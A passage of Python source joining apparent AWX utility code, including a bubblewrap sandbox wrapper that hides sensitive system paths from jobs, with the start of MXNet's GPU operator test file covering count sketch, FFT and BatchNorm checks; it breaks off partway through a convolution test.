    saved_environ = dict(os.environ)
    try:
        os.environ.update(environ)
        yield
    finally:
        # Restore the exact pre-entry environment, dropping any additions.
        os.environ.clear()
        os.environ.update(saved_environ)
@memoize()
def check_proot_installed():
    '''
    Check that proot is installed.
    '''
    from django.conf import settings
    cmd = [getattr(settings, 'AWX_PROOT_CMD', 'bwrap'), '--version']
    try:
        process = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE)
        process.communicate()
        return process.returncode == 0
    except (OSError, ValueError) as e:
        # ENOENT (errno 2) just means the binary is absent; anything else
        # is unexpected and worth a traceback in the logs.
        if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2:
            logger.exception('bwrap unavailable for unexpected reason.')
        return False
def build_proot_temp_dir():
    '''
    Create a temporary directory for proot to use.
    '''
    from django.conf import settings
    temp_dir = tempfile.mkdtemp(prefix='awx_proot_', dir=settings.AWX_PROOT_BASE_PATH)
    # Owner-only rwx (0o700) so other local users cannot inspect the sandbox dir.
    os.chmod(temp_dir, stat.S_IRWXU)
    return temp_dir
def wrap_args_with_proot(args, cwd, **kwargs):
    '''
    Wrap existing command line with proot to restrict access to:
     - AWX_PROOT_BASE_PATH (generally, /tmp) (except for own /tmp files)
    For non-isolated nodes:
     - /etc/tower (to prevent obtaining db info or secret key)
     - /var/lib/awx (except for current project)
     - /var/log/tower
     - /var/log/supervisor

    :param args: original command line as a list of strings
    :param cwd: working directory for the wrapped command
    :param kwargs: keys used here: ``proot_temp_dir`` (required),
        ``isolated``, ``private_data_dir``, ``proot_custom_virtualenv``,
        ``proot_show_paths``
    :return: new argv list with the bwrap prefix prepended
    '''
    from django.conf import settings
    cwd = os.path.realpath(cwd)
    new_args = [getattr(settings, 'AWX_PROOT_CMD', 'bwrap'), '--unshare-pid', '--dev-bind', '/', '/', '--proc', '/proc']
    hide_paths = [settings.AWX_PROOT_BASE_PATH]
    if not kwargs.get('isolated'):
        hide_paths.extend(['/etc/tower', '/var/lib/awx', '/var/log', '/etc/ssh',
                           settings.PROJECTS_ROOT, settings.JOBOUTPUT_ROOT])
    hide_paths.extend(getattr(settings, 'AWX_PROOT_HIDE_PATHS', None) or [])
    # Mask each hidden path by bind-mounting an empty temp dir/file over it.
    for path in sorted(set(hide_paths)):
        if not os.path.exists(path):
            continue
        path = os.path.realpath(path)
        if os.path.isdir(path):
            new_path = tempfile.mkdtemp(dir=kwargs['proot_temp_dir'])
            os.chmod(new_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
        else:
            handle, new_path = tempfile.mkstemp(dir=kwargs['proot_temp_dir'])
            os.close(handle)
            os.chmod(new_path, stat.S_IRUSR | stat.S_IWUSR)
        new_args.extend(['--bind', '%s' %(new_path,), '%s' % (path,)])
    # Paths that must stay visible inside the sandbox.
    if kwargs.get('isolated'):
        show_paths = [kwargs['private_data_dir']]
    elif 'private_data_dir' in kwargs:
        show_paths = [cwd, kwargs['private_data_dir']]
    else:
        show_paths = [cwd]
    # Virtualenvs are mounted read-only.
    for venv in (
        settings.ANSIBLE_VENV_PATH,
        settings.AWX_VENV_PATH,
        kwargs.get('proot_custom_virtualenv')
    ):
        if venv:
            new_args.extend(['--ro-bind', venv, venv])
    show_paths.extend(getattr(settings, 'AWX_PROOT_SHOW_PATHS', None) or [])
    show_paths.extend(kwargs.get('proot_show_paths', []))
    for path in sorted(set(show_paths)):
        if not os.path.exists(path):
            continue
        path = os.path.realpath(path)
        new_args.extend(['--bind', '%s' % (path,), '%s' % (path,)])
    if kwargs.get('isolated'):
        if '/bin/ansible-playbook' in ' '.join(args):
            # playbook runs should cwd to the SCM checkout dir
            new_args.extend(['--chdir', os.path.join(kwargs['private_data_dir'], 'project')])
        else:
            # ad-hoc runs should cwd to the root of the private data dir
            new_args.extend(['--chdir', kwargs['private_data_dir']])
    else:
        new_args.extend(['--chdir', cwd])
    new_args.extend(args)
    return new_args
def get_pk_from_dict(_dict, key):
    '''
    Helper for obtaining a pk from user data dict or None if not present.

    :param _dict: user-supplied mapping (None / non-mapping handled via TypeError)
    :param key: key under which a pk or model object may be stored
    :return: integer pk (or the object's ``id``), or None when missing/unparseable
    '''
    try:
        val = _dict[key]
        # A model object may be given in place of a raw pk; use its id.
        # (The original `isinstance(val, object)` guard was always True
        # and has been dropped as redundant.)
        if hasattr(val, 'id'):
            return val.id
        return int(val)
    except (TypeError, KeyError, ValueError):
        return None
class NoDefaultProvided(object):
    # Sentinel: distinguishes "no default passed" from a default of None.
    pass


def getattrd(obj, name, default=NoDefaultProvided):
    """
    Same as getattr(), but allows dot notation lookup
    Discussed in:
    http://stackoverflow.com/questions/11975781

    :param obj: object on which to resolve the dotted attribute path
    :param name: dotted attribute path, e.g. ``"a.b.c"``
    :param default: value returned if any step of the lookup fails; when
        omitted, the AttributeError propagates
    :raises AttributeError: if lookup fails and no default was given
    """
    try:
        return reduce(getattr, name.split("."), obj)
    except AttributeError:
        # Identity check: the sentinel marks "no default supplied".  The
        # original `!=` comparison could be fooled by values overriding
        # __eq__; `is not` is the correct sentinel test.
        if default is not NoDefaultProvided:
            return default
        raise
def getattr_dne(obj, name, notfound=ObjectDoesNotExist):
    """Like getattr(), but return None when the lookup raises ``notfound``."""
    try:
        value = getattr(obj, name)
    except notfound:
        return None
    return value
# Module-level registry of the active Django app configs; callers may swap
# in a different registry (e.g. a migration's historical apps) via
# set_current_apps() so lookups resolve against the right state.
current_apps = apps


def set_current_apps(apps):
    """Replace the module-level app registry."""
    global current_apps
    current_apps = apps


def get_current_apps():
    """Return the module-level app registry currently in effect."""
    global current_apps
    return current_apps
def get_custom_venv_choices(custom_paths=None):
    """Return discovered virtualenv directories (each with a trailing slash).

    Scans BASE_VENV_PATH plus any configured custom paths; a subdirectory
    counts as a venv when it contains ``bin/activate``.  The 'awx' venv
    itself is excluded.
    """
    from django.conf import settings
    search_roots = [settings.BASE_VENV_PATH] + (custom_paths or settings.CUSTOM_VENV_PATHS)
    choices = []
    for root in search_roots:
        if not os.path.exists(root):
            continue
        for entry in os.listdir(root):
            if entry == 'awx':
                continue
            candidate = os.path.join(root, entry)
            if os.path.isdir(candidate) and \
                    os.path.exists(os.path.join(candidate, 'bin', 'activate')):
                choices.append(os.path.join(candidate, ''))
    return choices
def is_ansible_variable(key):
    """Return True when ``key`` carries the Ansible-reserved ``ansible_`` prefix."""
    return key.startswith('ansible_')
def extract_ansible_vars(extra_vars):
    """Split ``extra_vars`` into (non-ansible vars dict, set of ansible var names).

    Ansible-reserved keys are removed from the parsed dict; only their
    names are reported back in the set.
    """
    parsed = parse_yaml_or_json(extra_vars)
    reserved = {key for key in list(parsed.keys()) if is_ansible_variable(key)}
    for key in reserved:
        parsed.pop(key)
    return (parsed, reserved)
def get_search_fields(model):
    """Return the subset of ``model``'s field names usable for text search."""
    searchable = ('username', 'first_name', 'last_name', 'email',
                  'name', 'description')
    return [field.name for field in model._meta.fields if field.name in searchable]
def has_model_field_prefetched(model_obj, field_name):
    # NOTE: Update this function if django internal implementation changes.
    # The related manager exposes prefetch_cache_name; the field counts as
    # prefetched when that name appears in the instance's prefetch cache.
    descriptor = getattr(model_obj, field_name, None)
    cache_key = getattr(descriptor, 'prefetch_cache_name', '')
    return cache_key in getattr(model_obj, '_prefetched_objects_cache', {})
def get_external_account(user):
    """Return the external auth source backing ``user``: 'ldap', 'social',
    'enterprise', or None for a local account.

    NOTE: the checks run in order and later matches overwrite earlier ones,
    so enterprise wins over social, which wins over ldap.
    """
    from django.conf import settings
    account_type = None
    if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):
        try:
            # LDAP-backed users have a dn recorded and no usable local password.
            if user.pk and user.profile.ldap_dn and not user.has_usable_password():
                account_type = "ldap"
        except AttributeError:
            # User has no profile attribute chain; treat as non-LDAP.
            pass
    if (getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None) or
            getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None) or
            getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None) or
            getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None) or
            getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)) and user.social_auth.all():
        account_type = "social"
    if (getattr(settings, 'RADIUS_SERVER', None) or
            getattr(settings, 'TACACSPLUS_HOST', None)) and user.enterprise_auth.all():
        account_type = "enterprise"
    return account_type
class classproperty:
    """Descriptor that evaluates ``fget`` against the owning class.

    Unlike ``property``, access through either the class or an instance
    passes the *class* to the getter.  ``fset``/``fdel`` are stored for API
    symmetry but are not invoked by this descriptor.
    """

    def __init__(self, fget=None, fset=None, fdel=None, doc=None):
        self.fget = fget
        self.fset = fset
        self.fdel = fdel
        # Borrow the getter's docstring unless one was given explicitly.
        if doc is None and fget is not None:
            doc = fget.__doc__
        self.__doc__ = doc

    def __get__(self, instance, ownerclass):
        return self.fget(ownerclass)
def create_temporary_fifo(data):
    """Open fifo named pipe in a new thread using a temporary file path. The
    thread blocks until data is read from the pipe.

    Returns the path to the fifo.

    :param data(bytes): Data to write to the pipe.
    """
    path = os.path.join(tempfile.mkdtemp(), next(tempfile._get_candidate_names()))
    # Owner-only permissions: the fifo may carry sensitive data.
    os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)

    def _write_and_close(fifo_path, payload):
        # Use a context manager so the write end is flushed and closed
        # deterministically; the original relied on GC to close the handle,
        # which can delay EOF for the reader and leak the fd.
        with open(fifo_path, 'wb') as fifo:
            fifo.write(payload)

    threading.Thread(target=_write_and_close, args=(path, data)).start()
    return path
def truncate_stdout(stdout, size):
    """Truncate ``stdout`` to ``size`` characters, closing dangling ANSI SGR codes.

    Returns the input unchanged when ``size`` is non-positive or the text
    already fits.  A truncated result ends with an ellipsis, and any ANSI
    style sequences left open by the cut are balanced with resets.
    """
    from awx.main.constants import ANSI_SGR_PATTERN
    if size <= 0 or len(stdout) <= size:
        return stdout
    truncated = stdout[:(size - 1)] + u'\u2026'
    # Count SGR "set" vs "reset" sequences that survived the cut; append
    # enough resets to close any styles still open.
    opened = 0
    closed = 0
    for match in ANSI_SGR_PATTERN.finditer(truncated):
        if match.group() == u'\u001b[0m':
            closed += 1
        else:
            opened += 1
    return truncated + u'\u001b[0m' * (opened - closed)
|
test_operator_gpu.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import unittest
import mxnet as mx
import numpy as np
import unittest
from nose.tools import assert_raises
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal
from mxnet.base import MXNetError
from numpy.testing import assert_allclose
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed
from test_operator import *
from test_optimizer import *
from test_random import *
from test_gluon import *
from test_loss import *
from test_exc_handling import *
#from test_rnn import *
from test_gluon_rnn import *
from test_sparse_ndarray import test_create_csr, test_create_row_sparse, test_sparse_nd_slice
from test_sparse_ndarray import test_create_sparse_nd_empty, test_create_sparse_nd_from_sparse
from test_sparse_ndarray import test_create_sparse_nd_from_dense, test_create_sparse_nd_infer_shape
from test_sparse_ndarray import test_sparse_nd_check_format, test_sparse_nd_copy
from test_sparse_ndarray import test_sparse_nd_setitem, test_sparse_nd_binary_scalar_op
from test_sparse_operator import *
from test_ndarray import *
# All tests in this module run against the first GPU device by default.
set_default_context(mx.gpu(0))
# Remove these star-imported SVM tests so the GPU test run does not
# collect them from this module.
del test_support_vector_machine_l1_svm
del test_support_vector_machine_l2_svm
def check_countsketch(in_dim,out_dim,n):
    """Check contrib.count_sketch forward/backward on GPU against a NumPy reference.

    :param in_dim: input feature dimension
    :param out_dim: sketched output dimension
    :param n: number of samples (batch size)
    """
    sym = mx.sym.contrib.count_sketch(name='countsketch',out_dim = out_dim)
    shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
    arr = [mx.nd.empty(shape[i]) for i in range(3)]
    arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
    x = np.random.uniform(-10, 10, shape[0])
    arr[0][:] = x                 #input x
    h = np.random.randint(0, out_dim, shape[1])
    arr[1][:] = h                 #hash h
    # Random signs in {-1, +1}.
    s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
    arr[2][:] = s                 #hash s
    # forward
    exe_list = [sym.bind(mx.gpu(0), arr, arr_grad)]
    for exe in exe_list:
        exe.forward(is_train= True)
    out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
    # NumPy reference: each input column idx contributes sign[idx]*x[:,idx]
    # into output bucket h[idx].
    a = np.zeros((n,out_dim))
    temp = np.multiply(x, s)
    for num_sample in np.arange(0,n):
        for idx in np.arange(0,in_dim):
            a[num_sample][h[0][idx]] += temp[num_sample][idx]
    assert_almost_equal(a,out1[0],rtol=1e-3, atol=1e-12)
    # backward
    out_grad = mx.nd.empty((n,out_dim))
    out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
    for exe in exe_list:
        exe.backward([out_grad])
    # Reference gradient: dL/dx[j,i] = s[i] * dL/dy[j, h[i]].
    a = np.zeros((n,in_dim))
    for j in np.arange(0,n):
        for i in np.arange(0,in_dim):
            a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
    assert_almost_equal(a,arr_grad[0].asnumpy(),rtol=1e-3, atol=1e-12)
@with_seed(0)
def test_countsketch():
    """Run check_countsketch on a couple of randomly sized problems."""
    min_in, max_in = 40, 100
    min_out, max_out = 5, 30
    max_samples = 200
    for _ in range(2):
        # Argument order matters for RNG reproducibility: in_dim, out_dim, n.
        check_countsketch(np.random.randint(min_in, max_in),
                          np.random.randint(min_out, max_out),
                          np.random.randint(1, max_samples))
def check_ifft(shape):
    """Check contrib.ifft on GPU against numpy.fft references.

    ``shape`` is the complex-valued logical shape; the op consumes an
    interleaved real/imag layout, so the last axis is padded to an even
    length and then doubled for the actual input array.
    """
    shape_old = shape
    if len(shape) == 2:
        if shape[1]%2 != 0:
            # Pad an odd last axis to even length.
            lst = list(shape)
            lst[1] = lst[1]*2
            shape = tuple(lst)
            shape_old = shape
        # Interleaved real/imag input is twice as wide.
        shape = (shape[0],shape[1]*2)
    if len(shape) == 4:
        if shape[3]%2 != 0:
            lst = list(shape)
            lst[3] = lst[3]*2
            shape = tuple(lst)
            shape_old = shape
        shape = (shape[0],shape[1],shape[2],shape[3]*2)
    sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
    init = [np.random.normal(size=shape, scale=1.0)]
    arr_grad = [mx.nd.empty(shape)]
    ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
    exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
    for exe in exe_list:
        for arr, iarr in zip(exe.arg_arrays, init):
            arr[:] = iarr.astype(arr.dtype)
    # forward
    for exe in exe_list:
        exe.forward(is_train= True)
    out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
    if len(shape) == 2:
        # Reassemble interleaved input into a complex array; the op output
        # is unnormalized, hence the division by the axis length.
        init_complex = np.zeros(shape_old,dtype = np.complex64)
        for i in range(0,shape_old[1]):
            init_complex.real[:,i] = init[0][:,2*i]
            init_complex.imag[:,i] = init[0][:,2*i+1]
        a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
        assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-12)
    if len(shape) == 4:
        init_complex = np.zeros(shape_old,dtype = np.complex64)
        for i in range(0,shape_old[3]):
            init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
            init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
        a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
        assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-12)
    # backward
    if len(shape) == 2:
        out_grad = mx.nd.empty(shape_old)
        out_grad[:] = np.random.normal(-3, 3, shape_old)
        for exe in exe_list:
            exe.backward([out_grad])
        # Extract the real components of the computed input gradient.
        # (A dead `temp = exe.grad_arrays[0].asnumpy()` assignment that was
        # immediately overwritten by np.zeros has been removed.)
        temp = np.zeros(shape_old)
        for i in range(shape_old[1]):
            temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
        a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
        assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
    if len(shape) == 4:
        out_grad = mx.nd.empty(shape_old)
        out_grad[:] = np.random.normal(-3, 3, shape_old)
        for exe in exe_list:
            exe.backward([out_grad])
        # Dead `temp = exe.grad_arrays[0].asnumpy()` removed here as well.
        temp = np.zeros(shape_old)
        for i in range(shape_old[3]):
            temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
        a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
        assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
@with_seed(0)
def test_ifft():
    """Exercise check_ifft over random 2D and 4D shapes, twice each."""
    maxdim = 10
    for _ in range(2):
        for ndim in (2, 4):
            check_ifft(tuple(np.random.randint(1, maxdim, size=ndim)))
def check_fft(shape):
    """Check contrib.fft on GPU against numpy.fft references.

    ``shape`` is the real input shape; the op emits interleaved real/imag
    output twice as wide on the last axis.  An odd last axis is padded to
    an even length first.
    """
    sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
    if len(shape) == 2:
        if shape[1]%2 != 0:
            # Pad an odd last axis to even length.
            lst = list(shape)
            lst[1] = lst[1]*2
            shape = tuple(lst)
        shape_old = shape
    if len(shape) == 4:
        if shape[3]%2 != 0:
            lst = list(shape)
            lst[3] = lst[3]*2
            shape = tuple(lst)
        shape_old = shape
    init = [np.random.normal(size=shape, scale=1.0)]
    arr_grad = [mx.nd.empty(shape)]
    ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
    exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
    for exe in exe_list:
        for arr, iarr in zip(exe.arg_arrays, init):
            arr[:] = iarr.astype(arr.dtype)
    #forward
    for exe in exe_list:
        exe.forward(is_train=True)
    out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
    out = np.fft.fft(init, n=None, axis=-1, norm=None)
    if len(shape) == 2:
        out = np.reshape(out,(out.shape[1],out.shape[2]))
        out2 = np.append(out.real, out.imag, axis = 1)
        # Interleave real/imag columns to match the op's output layout.
        a = np.zeros(out1[0].shape)
        p = 0
        for i in range(out2.shape[1]//2):
            a[:,p] = out2[:,i]
            a[:,p+1] = out2[:,i+out2.shape[1]//2]
            p = p+2
    if len(shape) == 4:
        out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
        out2 = np.append(out.real, out.imag, axis = 1)
        # Interleave real/imag along the last axis for 4-D data.
        a = np.zeros(out1[0].shape)
        for i in range(out1[0].shape[0]):
            for j in range(out1[0].shape[1]):
                p = 0
                for k in range(out2.shape[3]):
                    a[i,j,:,p] = out2[i,j,:,k]
                    a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
                    p = p+2
    assert_almost_equal(a, out1[0],rtol=1e-3, atol=1e-6)
    # backward
    if len(shape) == 2:
        out_grad = mx.nd.empty((shape[0],2*shape[1]))
        out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
        # out_grad_to_complex
        out_grad_complex = np.zeros(shape,dtype = np.complex64)
        for i in range(0,shape[1]):
            out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
            out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
        for exe in exe_list:
            exe.backward([out_grad])
        # The op's gradient is unnormalized; divide by the axis length.
        a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
        assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[1],rtol=1e-3, atol=1e-8)
    if len(shape) == 4:
        out_grad = mx.nd.empty(out1[0].shape)
        out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
        # out_grad_to_complex
        out_grad_complex = np.zeros(shape,dtype = np.complex64)
        for i in range(0,shape[3]):
            out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
            out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
        for exe in exe_list:
            exe.backward([out_grad])
        a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
        assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[3],rtol=1e-3, atol=1e-6)
@with_seed(0)
def test_fft():
    """Exercise check_fft over random 2D and 4D shapes, twice each."""
    maxdim = 10
    for _ in range(2):
        for ndim in (2, 4):
            check_fft(tuple(np.random.randint(1, maxdim, size=ndim)))
@with_seed()
def test_batchnorm_with_type():
    """Cross-check BatchNorm_v1 and BatchNorm outputs across CPU/GPU contexts
    and dtypes for 1D, 2D and 3D inputs, with fix_gamma on and off."""
    ctx_list_v1_2D = [
        {'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
    ]
    ctx_list_v2_2D = [
        {'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float16}},
        {'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float64}},
        {'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float16}},
        {'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float64}},
    ]
    ctx_list_v2_1D = [
        {'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float16}},
        {'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float64}},
        {'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float16}},
        {'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float64}},
    ]
    ctx_list_v2_3D = [
        {'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
        {'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}},
        {'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
        {'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}}
    ]
    # V1, 2D
    sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
    check_consistency(sym, ctx_list_v1_2D)
    sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
    check_consistency(sym, ctx_list_v1_2D)
    # V2, 2D
    # NOTE(review): each V2 configuration below is checked twice with an
    # identically-constructed symbol — presumably intentional repetition
    # under fresh random data; confirm before deduplicating.
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_2D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_2D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_2D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_2D)
    # V2, 1D
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_1D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_1D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_1D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_1D)
    #
    # # V2, 3D
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_3D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
    """Cross-check the BatchNorm implementations (v1 cpu/gpu, v2 cpu/gpu/cudnn)
    against each other for 1D, 2D and 3D data and every fix_gamma /
    use_global_stats combination."""
    def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
        # Build a matched pair of lists — one context dict and one symbol per
        # requested variant — and require identical results across them.
        ctx_list = []
        sym_list = []
        # BatchNormV1 cpu
        if 'batchnorm_v1_cpu' in batchnorm_op_list:
            ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
            sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
                                                use_global_stats=use_global_stats,
                                                name='batchnorm'))
        # BatchNormV1 gpu (organic)
        if 'batchnorm_v1_gpu' in batchnorm_op_list:
            ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
            sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
                                                use_global_stats=use_global_stats,
                                                name='batchnorm'))
        # BatchNorm cpu
        if 'batchnorm_cpu' in batchnorm_op_list:
            ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
            sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
                                             use_global_stats=use_global_stats,
                                             name='batchnorm'))
        # BatchNorm gpu (organic)
        if 'batchnorm_gpu' in batchnorm_op_list:
            ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
            sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
                                             use_global_stats=use_global_stats,
                                             name='batchnorm', cudnn_off=True))
        # BatchNorm gpu cudnn (if cudnn is enabled)
        if 'batchnorm_cudnn' in batchnorm_op_list:
            ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
            sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
                                             use_global_stats=use_global_stats,
                                             name='batchnorm', cudnn_off=False))
        check_consistency(sym_list, ctx_list)

    def test_1d_batchnorm(fix_gamma, use_global_stats):
        """1D (N, C, W) case — v2 variants only."""
        data = (2, 3, 20)
        test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
                                                          'batchnorm_gpu', 'batchnorm_cudnn'],
                                       data=data,
                                       fix_gamma=fix_gamma, use_global_stats=use_global_stats)

    def test_2d_batchnorm(fix_gamma, use_global_stats):
        """2D (N, C, H, W) case — the only case where the v1 variants are included."""
        data = (2, 3, 10, 10)
        test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
                                                          'batchnorm_cpu',
                                                          'batchnorm_gpu', 'batchnorm_cudnn'],
                                       data=data,
                                       fix_gamma=fix_gamma, use_global_stats=use_global_stats)

    def test_3d_batchnorm(fix_gamma, use_global_stats):
        """3D (N, C, D, H, W) case.
        NOTE(review): the cudnn variant is omitted here — presumably
        unsupported for this case; confirm."""
        data = (2, 3, 3, 5, 5)
        test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
                                                          'batchnorm_gpu'],
                                       data=data,
                                       fix_gamma=fix_gamma, use_global_stats=use_global_stats)

    # Every (fix_gamma, use_global_stats) combination per dimensionality.
    test_1d_batchnorm(True, False)
    test_1d_batchnorm(False, False)
    test_1d_batchnorm(False, True)
    test_1d_batchnorm(True, True)

    test_2d_batchnorm(True, False)
    test_2d_batchnorm(False, False)
    test_2d_batchnorm(False, True)
    test_2d_batchnorm(True, True)

    test_3d_batchnorm(True, False)
    test_3d_batchnorm(False, False)
    test_3d_batchnorm(False, True)
    test_3d_batchnorm(True, True)
@with_seed(1234)
def test_convolution_with_type():
    """Cross-check Convolution results across dtypes and contexts for NCHW,
    plus an NHWC variant emulated via transposes."""
    sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
    data = mx.sym.Variable('conv_data')
